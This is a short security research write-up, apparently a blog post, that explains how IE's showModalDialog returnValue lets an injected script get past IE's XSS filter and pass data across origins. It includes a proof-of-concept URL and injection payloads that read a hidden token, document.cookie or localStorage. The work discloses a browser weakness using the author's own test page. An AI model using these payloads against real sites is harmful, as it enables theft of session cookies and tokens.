Using showModalDialog to bypass IE's XSS Filter
Today I want to share an article about using showModalDialog to bypass IE's XSS filter.
showModalDialog has been around for many years. It has since disappeared from the web standards, but it has a unique mechanism, so I think this write-up is still worthwhile. The function is supported in IE, Firefox and Safari; note that it is no longer supported as of Chrome 37.
First, a summary of how showModalDialog is used. It is called as window.showModalDialog(url, arguments).
The first parameter is the URL to open in the modal dialog, and the second is the argument to pass to that dialog; inside the dialog window it is available as window.dialogArguments.
Passing data through window.dialogArguments requires the two windows to be same-origin.
returnValue behaves differently: in Safari and IE the two windows do not need to be same-origin, but in Firefox they do.
Here is my test address:
http://vulnerabledoma.in/showModalDialog/opener.html
Safari passes the value across origins without any trick; click the "x-origin" button to test.
In IE, passing data across origins additionally requires a 3xx redirect; click "x-origin (redirect)" to test.
So in Safari and IE, returnValue lets information be passed to another origin. This may pose a threat to many web applications, though of course I would not recommend using showModalDialog in 2015 anyway.
Using this, an attacker can bypass IE's XSS filter.
Conditions:
1. XSS in a JavaScript context (the injection lands inside a script block)
2. The page contains sensitive information that script can read (such as a token)
The following is my test page:
http://vulnerabledoma.in/xss_token?q=[XSS_HERE]
<form name=form>
<input type=hidden name=token value=f9d150048b>
</form>
<script>var q="[XSS_HERE]"</script>
Seeing is believing. Open the PoC below in IE:
http://l0.cm/xssfilter_bypass/showModalDialog.html
If it succeeds, an alert showing the token string appears when you close the modal dialog.
Let's look at the details. The PoC redirects you to:
http://vulnerabledoma.in/xss_token?q=%22%3BreturnValue=form.token.value//
With the payload injected, the page becomes:
<form name=form>
<input type=hidden name=token value=f9d150048b>
</form>
<script>var q="";returnValue=form.token.value//"</script>
The injected statement assigns the token to returnValue, so the opener receives it when the dialog closes.
Needless to say, the same principle works with payloads such as:
";returnValue=document.cookie//
";returnValue=localStorage.key//
(I also tried to access the window object of the other page through window.opener)